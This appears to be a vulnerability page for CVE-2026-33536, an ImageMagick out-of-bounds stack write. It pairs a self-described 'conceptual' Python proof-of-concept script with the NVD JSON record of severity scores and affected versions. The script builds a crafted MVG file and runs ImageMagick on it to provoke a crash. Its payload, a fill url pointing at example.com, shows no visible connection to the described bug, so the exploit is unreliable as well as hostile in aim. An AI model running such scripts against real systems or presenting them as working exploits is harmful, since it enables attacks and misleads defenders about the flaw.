CVE-2026-33536

# PoC for CVE-2026-33536 (Conceptual) # This script attempts to trigger the out-of-bounds write vulnerability # by processing a crafted image file with a vulnerable ImageMagick version. import subprocess import os # Filename for the crafted payload payload_filename = "cve_2026_33536_poc.mvg" # Constructing a minimal MVG (Magick Vector Graphics) file # that may trigger the incorrect return value logic on specific platforms. # Note: Actual trigger structure depends on the specific platform and internal logic. payload_content = b""" push graphic-context viewbox 0 0 640 480 fill "url(https://example.com/triggers-logic)" pop graphic-context """ print(f"[*] Creating crafted payload file: {payload_filename}") with open(payload_filename, "wb") as f: f.write(payload_content.lstrip()) print(f"[*] Attempting to process payload with ImageMagick (convert)...") try: # Execute ImageMagick convert command # This attempts to parse the MVG file and render it result = subprocess.run( ["convert", payload_filename, "output.png"], capture_output=True, text=True, timeout=5 ) # Check if the process crashed (returned non-zero or stderr output) if result.returncode != 0: print(f"[!] Process exited with error code: {result.returncode}") print(f"[!] Stderr: {result.stderr}") else: print("[*] Payload processed without immediate crash (may require specific platform/config)") except subprocess.TimeoutExpired: print("[!] Process timed out - possible indication of hang or infinite loop") except FileNotFoundError: print("[!] 'convert' command not found. Please ensure ImageMagick is installed and in PATH.") except Exception as e: print(f"[!] An unexpected error occurred: {e}") finally: # Cleanup if os.path.exists(payload_filename): os.remove(payload_filename) if os.path.exists("output.png"): os.remove("output.png") print("[*] Cleanup completed.")

{"cve": {"id": "CVE-2026-33536", "sourceIdentifier": "[email protected]", "published": "2026-03-26T20:16:15.877", "lastModified": "2026-04-02T17:47:47.153", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to 7.1.2-18 and 6.9.13-43, due to an incorrect return value on certain platforms a pointer is incremented past the end of a buffer that is on the stack and that could result in an out of bounds write. Versions 7.1.2-18 and 6.9.13-43 patch the issue."}, {"lang": "es", "value": "ImageMagick es un software libre y de código abierto utilizado para editar y manipular imágenes digitales. Antes de 7.1.2-18 y 6.9.13-43, debido a un valor de retorno incorrecto en ciertas plataformas, un puntero se incrementa más allá del final de un búfer que está en la pila y eso podría resultar en una escritura fuera de límites. Las versiones 7.1.2-18 y 6.9.13-43 parchean el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.4, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.0, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-121"}, {"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*", "versionEndExcluding": "6.9.13-43", "matchCriteriaId": "AE210D23-0EC1-400A-A545-0CABCB44EF78"}, {"vulnerable": true, "criteria": "cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.0.0-0", "versionEndExcluding": "7.1.2-18", "matchCriteriaId": "A761D9D6-07EA-4D5D-94AA-7ED80672FE0E"}]}]}], "references": [{"url": "https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-8793-7xv6-82cf", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}